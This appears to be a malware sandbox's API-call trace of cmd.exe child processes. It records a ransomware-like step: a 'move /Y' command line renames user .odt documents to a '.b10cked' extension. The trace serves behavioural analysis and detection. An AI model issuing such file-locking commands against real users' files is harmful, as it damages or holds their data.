[0140.635] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.636] GetConsoleOutputCP () returned 0x1b5 [0140.636] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.636] GetUserDefaultLCID () returned 0x409 [0140.637] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: 
lpLCData=":") returned 2 [0140.637] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f700, cchData=128 | out: lpLCData="0") returned 2 [0140.637] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18f700, cchData=128 | out: lpLCData="0") returned 2 [0140.637] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18f700, cchData=128 | out: lpLCData="1") returned 2 [0140.637] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0140.637] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0140.637] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0140.637] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0140.637] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0140.637] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0140.637] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0140.637] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0140.637] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0140.637] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0140.637] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0140.638] GetConsoleTitleW (in: lpConsoleTitle=0x2f08d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.639] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.639] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") 
returned 0x7694ac6c [0140.639] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0140.639] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0140.640] _wcsicmp (_String1="move", _String2=")") returned 68 [0140.640] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0140.640] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0140.640] _wcsicmp (_String1="IF", _String2="move") returned -4 [0140.640] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0140.640] _wcsicmp (_String1="REM", _String2="move") returned 5 [0140.640] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0140.643] GetConsoleTitleW (in: lpConsoleTitle=0x18f3f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.030] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0141.030] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0141.030] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0141.030] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0141.030] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0141.030] _wcsicmp (_String1="move", _String2="CD") returned 10 [0141.030] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0141.030] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0141.030] _wcsicmp (_String1="move", _String2="REN") returned -5 [0141.030] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0141.030] _wcsicmp (_String1="move", _String2="SET") returned -6 [0141.031] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0141.031] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0141.031] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0141.031] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0141.031] _wcsicmp (_String1="move", _String2="MD") returned 11 [0141.031] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0141.031] _wcsicmp (_String1="move", 
_String2="RD") returned -5 [0141.031] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0141.031] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0141.031] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0141.031] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0141.031] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0141.031] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0141.031] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0141.031] _wcsicmp (_String1="move", _String2="VER") returned -9 [0141.031] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0141.031] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0141.031] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0141.031] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0141.031] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0141.031] _wcsicmp (_String1="move", _String2="START") returned -6 [0141.031] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0141.031] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0141.031] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0141.033] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0141.033] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0141.033] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18f1b4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x18f1ac, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18f1ac*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0141.034] 
_wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0141.034] _wcsnicmp (_String1="COPYCMD", 
_String2="SystemR", _MaxCount=0x7) returned -16 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0141.034] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0141.035] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0141.035] _wcsicmp (_String1="EGB3US~1.ODT", _String2=".") returned 55 [0141.035] _wcsicmp (_String1="EGB3US~1.ODT", _String2="..") returned 55 [0141.035] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\EGB3US~1.ODT" (normalized: "c:\\users\\eebsym5\\desktop\\egb3us~1.odt")) returned 0x20 [0141.035] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x301d40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.035] SetErrorMode (uMode=0x0) returned 0x0 [0141.035] SetErrorMode (uMode=0x1) returned 0x0 [0141.035] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\EGB3US~1.ODT", nBufferLength=0x104, lpBuffer=0x18eb3c, lpFilePart=0x18eb24 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\EGB3US~1.ODT", lpFilePart=0x18eb24*="EGB3US~1.ODT") returned 0x25 [0141.035] SetErrorMode (uMode=0x0) returned 0x1 [0141.035] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0141.036] _wcsicmp (_String1="EGB3US~1.ODT", _String2=".") returned 55 [0141.036] _wcsicmp (_String1="EGB3US~1.ODT", _String2="..") returned 55 [0141.036] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\EGB3US~1.ODT" (normalized: "c:\\users\\eebsym5\\desktop\\egb3us~1.odt")) returned 0x20 [0141.036] SetErrorMode (uMode=0x0) returned 0x0 
[0141.036] SetErrorMode (uMode=0x1) returned 0x0 [0141.036] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\EGB3US~1.ODT", nBufferLength=0x104, lpBuffer=0x18efb8, lpFilePart=0x18ed50 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\EGB3US~1.ODT", lpFilePart=0x18ed50*="EGB3US~1.ODT") returned 0x25 [0141.036] SetErrorMode (uMode=0x0) returned 0x1 [0141.036] SetErrorMode (uMode=0x0) returned 0x0 [0141.036] SetErrorMode (uMode=0x1) returned 0x0 [0141.036] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\egB3USbk0IDbq.odt.b10cked", nBufferLength=0x104, lpBuffer=0x18f1c0, lpFilePart=0x18ed50 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\egB3USbk0IDbq.odt.b10cked", lpFilePart=0x18ed50*="egB3USbk0IDbq.odt.b10cked") returned 0x32 [0141.036] SetErrorMode (uMode=0x0) returned 0x1 [0141.036] SetLastError (dwErrCode=0x0) [0141.036] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\egB3USbk0IDbq.odt.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\egb3usbk0idbq.odt.b10cked")) returned 0xffffffff [0141.036] GetLastError () returned 0x2 [0141.036] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\EGB3US~1.ODT", fInfoLevelId=0x1, lpFindFileData=0x18e6cc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18e6cc) returned 0x2f0f08 [0141.037] FindNextFileW (in: hFindFile=0x2f0f08, lpFindFileData=0x18e6cc | out: lpFindFileData=0x18e6cc) returned 0 [0141.037] GetLastError () returned 0x12 [0141.037] FindClose (in: hFindFile=0x2f0f08 | out: hFindFile=0x2f0f08) returned 1 [0141.038] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\EGB3US~1.ODT", fInfoLevelId=0x1, lpFindFileData=0x301ae0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x301ae0) returned 0x2f0f08 [0141.038] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\egB3USbk0IDbq.odt.b10cked", nBufferLength=0x104, lpBuffer=0x18e964, lpFilePart=0x0 | out: 
lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\egB3USbk0IDbq.odt.b10cked", lpFilePart=0x0) returned 0x32 [0141.038] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\egB3USbk0IDbq.odt", nBufferLength=0x104, lpBuffer=0x18e964, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\egB3USbk0IDbq.odt", lpFilePart=0x0) returned 0x2a [0141.038] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\egB3USbk0IDbq.odt" (normalized: "c:\\users\\eebsym5\\desktop\\egb3usbk0idbq.odt")) returned 0x20 [0141.038] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\egB3USbk0IDbq.odt" (normalized: "c:\\users\\eebsym5\\desktop\\egb3usbk0idbq.odt"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\egB3USbk0IDbq.odt.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\egb3usbk0idbq.odt.b10cked"), dwFlags=0x3) returned 1 [0141.039] FindClose (in: hFindFile=0x2f0f08 | out: hFindFile=0x2f0f08) returned 1 [0141.040] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x18e918 | out: _Buffer=" 1") returned 9 [0141.040] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.040] GetFileType (hFile=0x7) returned 0x2 [0141.040] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0141.040] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18e8a4 | out: lpMode=0x18e8a4) returned 1 [0141.040] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.040] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18e8d8 | out: lpConsoleScreenBufferInfo=0x18e8d8) returned 1 [0141.040] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0141.041] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x18e918 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0141.041] WriteConsoleW (in: hConsoleOutput=0x7, 
lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x18e8fc, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x18e8fc*=0x1a) returned 1 [0141.041] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.041] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0141.041] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.041] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0141.041] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.041] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0141.042] SetConsoleInputExeNameW () returned 0x1 [0141.042] GetConsoleOutputCP () returned 0x1b5 [0141.042] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0141.042] SetThreadUILanguage (LangId=0x0) returned 0x409 [0141.042] exit (_Code=0) Process: id = "165" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ae0" os_pid = "0xe54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\VAFVM9~1.ODT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\vaFvM9aFd9qECGT.odt.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14802 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" 
Region: id = 14803 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14804 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14805 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 14806 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14807 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14808 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14809 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14810 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 14811 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 16142 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 16143 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 16144 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 
region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 16145 start_va = 0x3e0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 16146 start_va = 0x6a0000 end_va = 0x6affff entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 16147 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 16148 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 16149 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 16150 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 16151 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 16152 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 16153 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: 
"c:\\windows\\system32\\usp10.dll") Region: id = 16154 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 16155 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 16156 start_va = 0x230000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 16157 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 16158 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 16159 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 16160 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 16161 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 16162 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 16163 start_va = 0x4e0000 end_va = 0x5e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 16164 start_va = 0x6b0000 end_va = 0x12affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 16165 start_va = 0x12b0000 end_va = 0x1412fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012b0000" filename = "" Thread: id = 222 os_tid = 0xdf8 [0141.866] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fa9c | out: lpSystemTimeAsFileTime=0x22fa9c*(dwLowDateTime=0x8e7e4e80, dwHighDateTime=0x1d440a9)) [0141.866] GetCurrentProcessId () returned 0xe54 [0141.866] GetCurrentThreadId () returned 0xdf8 [0141.866] GetTickCount () returned 0x2c715 [0141.866] QueryPerformanceCounter (in: lpPerformanceCount=0x22fa94 | out: lpPerformanceCount=0x22fa94*=19865521708) returned 1 [0141.867] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0141.867] __set_app_type (_Type=0x1) [0141.867] __p__fmode () returned 0x76b331f4 [0141.867] __p__commode () returned 0x76b331fc [0141.867] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0141.867] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0141.867] GetCurrentThreadId () returned 0xdf8 [0141.867] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xdf8) returned 0x38 [0141.867] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0141.868] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0141.868] SetThreadUILanguage (LangId=0x0) returned 0x409 [0141.868] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0141.868] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22fa2c | out: phkResult=0x22fa2c*=0x0) returned 0x2 [0141.868] VirtualQuery (in: lpAddress=0x22fa63, lpBuffer=0x22f9fc, dwLength=0x1c | out: lpBuffer=0x22f9fc*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, 
Type=0x20000)) returned 0x1c [0141.868] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22f9fc, dwLength=0x1c | out: lpBuffer=0x22f9fc*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0141.868] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22f9fc, dwLength=0x1c | out: lpBuffer=0x22f9fc*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0141.868] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22f9fc, dwLength=0x1c | out: lpBuffer=0x22f9fc*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.868] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22f9fc, dwLength=0x1c | out: lpBuffer=0x22f9fc*(BaseAddress=0x230000, AllocationBase=0x230000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0141.868] GetConsoleOutputCP () returned 0x1b5 [0141.868] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0141.868] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0141.869] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.869] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0141.869] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.869] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0141.869] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.869] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0141.869] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.869] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0141.871] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.871] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0141.871] 
